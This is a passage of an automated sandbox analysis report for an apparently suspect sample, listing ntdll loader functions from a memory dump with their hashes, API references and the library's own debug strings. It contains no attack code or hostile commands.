Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e93ea0af7f1274f3f80b29110ec9358a5ef318a8798f14f8708c678ba452e12e
Instruction ID: 507328234a6d25b41ea43eb735ebfd3258d4965db63bb2e8b0a305417978d97b
Opcode Fuzzy Hash: e93ea0af7f1274f3f80b29110ec9358a5ef318a8798f14f8708c678ba452e12e
Instruction Fuzzy Hash: 5B90027120158802D1107158840474E000D97E0301F5AC411A8424658DC69989917221

Function 01A52FB0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52FBA

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 53eef07869a1092c6913729185a2587191f20c702ce73c811f41a3cc5831f1cd
Instruction ID: be9a9048dda0f05067636d93095e5b880f6d5581514472364570eec15059fc42
Opcode Fuzzy Hash: 53eef07869a1092c6913729185a2587191f20c702ce73c811f41a3cc5831f1cd
Instruction Fuzzy Hash: 469002616015004241407168884490A400DBBF1211B56C121A4998550DC55D89655765

Function 01A52F90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52F9A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2e187b0321cb4ef431b1630be49b90067566610cd40c85b2fa796a0def525748
Instruction ID: 6815333802ff670337643359f1959ed4e38d970bcb4a8c7231117a7a36f49ec9
Opcode Fuzzy Hash: 2e187b0321cb4ef431b1630be49b90067566610cd40c85b2fa796a0def525748
Instruction Fuzzy Hash: 4190027120190402D1007158481470F000D97E0302F56C011A5164555DC62989516671

Function 01A52FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01A52FEA

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: e212bd7027eade9dd06dcd5d7c5cac6eb9b2f941b29366d5d02c427447afe919
Instruction ID: 7ec55d577abe037cf9f2db5e56ecc8af068007ebfa34ae07b2aadea3a079008b
Opcode Fuzzy Hash: e212bd7027eade9dd06dcd5d7c5cac6eb9b2f941b29366d5d02c427447afe919
Instruction Fuzzy Hash: 14900261211D0042D20075684C14B0B000D97E0303F56C115A4154554CC91989615621

Function 01A52F30 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52F3A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f819fa71afaa9e74ddd74a03fdd813732b0a1e238eb9541de692d8f88ef20444
Instruction ID: 96bafbb37fafe155283ce66a5fc7a34f951332568b5e55869bf45a7720ed6494
Opcode Fuzzy Hash: f819fa71afaa9e74ddd74a03fdd813732b0a1e238eb9541de692d8f88ef20444
Instruction Fuzzy Hash: 449002A134150442D10071584414B0A000DD7F1301F56C015E5064554DC61DCD526226

Function 01A52EA0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52EAA

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b1b1c015d5ea17786c239100fc935ffea883dd2e1deeed1044f01d6cad6c0f3
Instruction ID: b3761f43a40b68028872f9beb38c6f66c9a1ce7c535b851ad352875f6b73e65e
Opcode Fuzzy Hash: 9b1b1c015d5ea17786c239100fc935ffea883dd2e1deeed1044f01d6cad6c0f3
Instruction Fuzzy Hash: B99002B120150402D1407158440474A000D97E0301F56C011A9064554EC65D8ED56765

Function 01A52E80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52E8A

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: a2d4a394290cbbb04a91b124cc8093b2a9555e0fa79c3b746648d2ffe9e13778
Instruction ID: 92b39002324cefc2da020ad07afd36bf866e387799ee0117d6ef205d6c4c5843
Opcode Fuzzy Hash: a2d4a394290cbbb04a91b124cc8093b2a9555e0fa79c3b746648d2ffe9e13778
Instruction Fuzzy Hash: 3D90026160150502D1017158440461A000E97E0241F96C022A5024555ECA298A92A231

Function 01A52C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01A52C24

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 8dc3e1334a01f9eae1f6fc07877ca0609ccd0f036d826536a6ed17871e6602c2
Instruction ID: 9f83e39550bdf0f2fd3e1d32c662047b1e49ea30b2320d57b138247469a760d7
Opcode Fuzzy Hash: 8dc3e1334a01f9eae1f6fc07877ca0609ccd0f036d826536a6ed17871e6602c2
Instruction Fuzzy Hash: 0BB09B719055C5C5DB51E764460871B790477D0701F16C072D6030641F473CC5D1E275

Function 0041F0E9 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1496211469.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_41f000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e34c62e47f9e69f4282139fc37e9e6b6bc6304f9e6aa6b6a2ce49fc4a9225390
Instruction ID: fee1ccfba95efa6d9597267d89063df1a8e0e58e3cefff64f40ff9d12133e1b3
Opcode Fuzzy Hash: e34c62e47f9e69f4282139fc37e9e6b6bc6304f9e6aa6b6a2ce49fc4a9225390
Instruction Fuzzy Hash: 09B01266DAD00C0A0C3474EC35038E77FC6C86A1AAB1003EBFF0C8139539064C3211E7

Function 0041F0F0 Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1496211469.000000000041F000.00000040.00000400.00020000.00000000.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_41f000_po8909893299832.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b9f8b07fea5db4bbec7f5d26f0e2d27b443d0e5888b6a4560a2a3835bf231a7
Instruction ID: bf268d91f619938eb03b39c7895fca664e884f2412e91478f794490b2a2455dc
Opcode Fuzzy Hash: 6b9f8b07fea5db4bbec7f5d26f0e2d27b443d0e5888b6a4560a2a3835bf231a7
Instruction Fuzzy Hash: 71A022A8C0830C03002030FA2A03023B38CC000008F0003EAAE8C022023C02AC3200EB

Non-executed Functions

Function 01A92349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A93187
@, xrefs: 01A92B74
ExecuteOptions, xrefs: 01A925A0
MaxLoaderThreads, xrefs: 01A924EC
@, xrefs: 01A92942
DisableExceptionChainValidation, xrefs: 01A9275F
GlobalFlag, xrefs: 01A92F3F, 01A93059
MinimumStackCommitInBytes, xrefs: 01A92BB0
UseImpersonatedDeviceMap, xrefs: 01A9251C
DisableHeapLookaside, xrefs: 01A9246D
TracingFlags, xrefs: 01A92549
LdrpInitializeExecutionOptions, xrefs: 01A9317D
CFGOptions, xrefs: 01A92967
MaxDeadActivationContexts, xrefs: 01A92D82
UnloadEventTraceDepth, xrefs: 01A924C0
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01A93176
GlobalFlag2, xrefs: 01A92FC0
FrontEndHeapDebugOptions, xrefs: 01A92489
ShutdownFlags, xrefs: 01A924A1
RaiseExceptionOnPossibleDeadlock, xrefs: 01A92579

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: 26f5ced46dde3635eb191cb1bfe91fc19a29c2a1a97d9017745b545f3fac1ca1
Instruction ID: 704082d9a0a096979e3517cd013992e3ba7583961dd04ec944770ef201a83c2a
Opcode Fuzzy Hash: 26f5ced46dde3635eb191cb1bfe91fc19a29c2a1a97d9017745b545f3fac1ca1
Instruction Fuzzy Hash: E8928071608342AFEB21DF29C880B6BB7E8BF84754F04491EFA95D7251D774E884CB92

Function 01A48620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Critical section address, xrefs: 01A85425, 01A854BC, 01A85534
Critical section debug info address, xrefs: 01A8541F, 01A8552E
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A8540A, 01A85496, 01A85519
double initialized or corrupted critical section, xrefs: 01A85508
Invalid debug info address of this critical section, xrefs: 01A854B6
Thread identifier, xrefs: 01A8553A
8, xrefs: 01A852E3
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A854CE
Thread is in a state in which it cannot own a critical section, xrefs: 01A85543
Critical section address., xrefs: 01A85502
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01A854E2
Address of the debug info found in the active list., xrefs: 01A854AE, 01A854FA
undeleted critical section in freed memory, xrefs: 01A8542B
corrupted critical section, xrefs: 01A854C2

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 141b688bc1e015913d9c0d2469dc4c98d11af13c212aca779723e4f05c0af688
Instruction ID: 264ca1dc6fcf8d64644f6ba899d991c883bc441df7661d884de786976002f483
Opcode Fuzzy Hash: 141b688bc1e015913d9c0d2469dc4c98d11af13c212aca779723e4f05c0af688
Instruction Fuzzy Hash: B0818BB1E40348AFDB61CF99C844BAEBBB5FB48B14F144159FA08B7290D3B5A945CB60

Function 01AC0274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01AC02A8

Strings

Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 01AC069F
Just reallocated block at %p to %Ix bytes, xrefs: 01AC05F1
RtlReAllocateHeap, xrefs: 01AC02BF, 01AC0362
About to reallocate block at %p to %Ix bytes, xrefs: 01AC03BA
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 01AC04D3
HEAP[%wZ]: , xrefs: 01AC0399, 01AC04A8, 01AC05D0, 01AC0675, 01AC06CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 01AC06EA
HEAP: , xrefs: 01AC03A6, 01AC04B5, 01AC05DD, 01AC0682, 01AC06D9

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: d5d809175108bb11bd57f7035e56a7048d08e776f2d154d35597629769c809f4
Instruction ID: 12b0e6ea40f0dfd5fea014bdf387d053e51cec5b66773a83ca2d9be16470678b
Opcode Fuzzy Hash: d5d809175108bb11bd57f7035e56a7048d08e776f2d154d35597629769c809f4
Instruction Fuzzy Hash: 6FD1DC39600686EFDB22DFA8D640AAAFBF1FF59B14F08805DF5499B252C734D981CB14

Function 01A429F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 01A824C0
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01A82412
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01A82506
@, xrefs: 01A8259B
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01A82409
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 01A822E4
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01A82624
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 01A825EB
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01A82498
RtlpResolveAssemblyStorageMapEntry, xrefs: 01A8261F
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01A82602

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: d1044870fb82fb307de54d732ad20ca9cc37e03b4f80f160ebb0e20a20dab430
Instruction ID: a872d14fc1ab35b645dd913bd6f4b35c13eaa08db4ef552b6620680cc74fc516
Opcode Fuzzy Hash: d1044870fb82fb307de54d732ad20ca9cc37e03b4f80f160ebb0e20a20dab430
Instruction Fuzzy Hash: 310250F1D002299FDB31DB54CD80BAAB7B8AF94704F4441EAE749A7241E7709E84CF69

Function 01AB8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

services.exe, xrefs: 01AB8B96
DefaultBrowser_NOPUBLISHERID, xrefs: 01AB8D00
svchost.exe, xrefs: 01AB8B68
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01AB8BD0
lsass.exe, xrefs: 01AB8BA1
smss.exe, xrefs: 01AB8B8B
heapType, xrefs: 01AB8BCB
runtimebroker.exe, xrefs: 01AB8B73
SegmentHeap, xrefs: 01AB8BE9
csrss.exe, xrefs: 01AB8B80

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 1bed8a73161f6809dfebb694c757745484924c4f1dd0a9f1a6c85b639fc761fc
Instruction ID: 9289f83a00953a87a498fb4bc8b60f5371dee3bc6109821514baa6949dd71c4a
Opcode Fuzzy Hash: 1bed8a73161f6809dfebb694c757745484924c4f1dd0a9f1a6c85b639fc761fc
Instruction Fuzzy Hash: B851B0B11043829BD32ADF5CC984BEBBBECAF94640F14491EE959C3242E778D508CBD2

Function 01A0645D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01A0656C

Part of subcall function 01A065B5: RtlDebugPrintTimes.NTDLL ref: 01A06664
Part of subcall function 01A065B5: RtlDebugPrintTimes.NTDLL ref: 01A066AF

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A69A11, 01A69A3A
apphelp.dll, xrefs: 01A06496
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 01A699ED
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 01A69A2A
LdrpInitShimEngine, xrefs: 01A699F4, 01A69A07, 01A69A30
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01A69A01

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-204845295
Opcode ID: 7b1fe8e6b1950add764a3fc8b666897d4e15e43be76e48e8f652afcbff526b0f
Instruction ID: a82321951e1562344035460dea121f4e76427c280e87b170a4cc99ef5fb7a4de
Opcode Fuzzy Hash: 7b1fe8e6b1950add764a3fc8b666897d4e15e43be76e48e8f652afcbff526b0f
Instruction Fuzzy Hash: DB51E071248300AFE722DF24D945FABB7E8FBA4748F04091DF689971A0D730E905CB92

Function 01A989B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01A98A67
HandleTraces, xrefs: 01A98C8F
AVRF: -*- final list of providers -*- , xrefs: 01A98B8F
VerifierFlags, xrefs: 01A98C50
VerifierDlls, xrefs: 01A98CBD
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01A98A3D
VerifierDebug, xrefs: 01A98CA5

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: 46b920f4171ed8fcfb291715f2532cf261e0fbb7b24f73de8c2a43665bf5bde5
Instruction ID: 8078efec695b35422e161d8d271085236726b0e47104b65bed31eb4c112ca595
Opcode Fuzzy Hash: 46b920f4171ed8fcfb291715f2532cf261e0fbb7b24f73de8c2a43665bf5bde5
Instruction Fuzzy Hash: 8991267160131AAFDB32EF28C980B2B7BE4AF95714F09445CFA446B651C738EC84CB91

Function 01A3245A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 01A7A9A2
apphelp.dll, xrefs: 01A32462
LdrpDynamicShimModule, xrefs: 01A7A998
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 01A7A992

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: 445d66db8093cc516fb36c009226f2fe1c3d842f25964cc9b726e25f965e7861
Instruction ID: 424831b2efb3c78866c4dbb9090b710b0aed38b85cc2feee173b4a05fac163dc
Opcode Fuzzy Hash: 445d66db8093cc516fb36c009226f2fe1c3d842f25964cc9b726e25f965e7861
Instruction Fuzzy Hash: 3A310572A00201BBDB36AF5DDD85B6EBBF4FB94B04F19005AF911A7255C7B09A91CB80

Function 01A1EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

R, xrefs: 01A1EB62
LdrpResSearchResourceInsideDirectory Enter, xrefs: 01A1EB58
T, xrefs: 01A1EB4E
{, xrefs: 01A74643
LdrpResSearchResourceInsideDirectory Exit, xrefs: 01A1EB6C
, xrefs: 01A1F299

Memory Dump Source

Source File: 00000009.00000002.1497285898.00000000019E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 019E0000, based on PE: true

Associated: 00000009.00000002.1497285898.0000000001B09000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B0D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.1497285898.0000000001B7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_19e0000_po8909893299832.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 31c93990d7da4dc1c617128a1541074b2ac9dd414eda3bfc25e8bb48adf223b0
Instruction ID: 76843423d2eaa0c667f9070eaeed0317b8f7991465c3639fa4d1a99fc9117865
Opcode Fuzzy Hash: 31c93990d7da4dc1c617128a1541074b2ac9dd414eda3bfc25e8bb48adf223b0
Instruction Fuzzy Hash: 07A27A70A0566A8FDF65CF18CD98BA9BBB5BF49300F1442E9D90DA7295DB309E84CF00

Function 01A463FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

_LdrpInitialize, xrefs: 01A840DF, 01A84141, 01A84205, 01A8425F
minkernel\ntdll\ldrinit.c, xrefs: 01A840E9, 01A8414B, 01A8420F, 01A84269
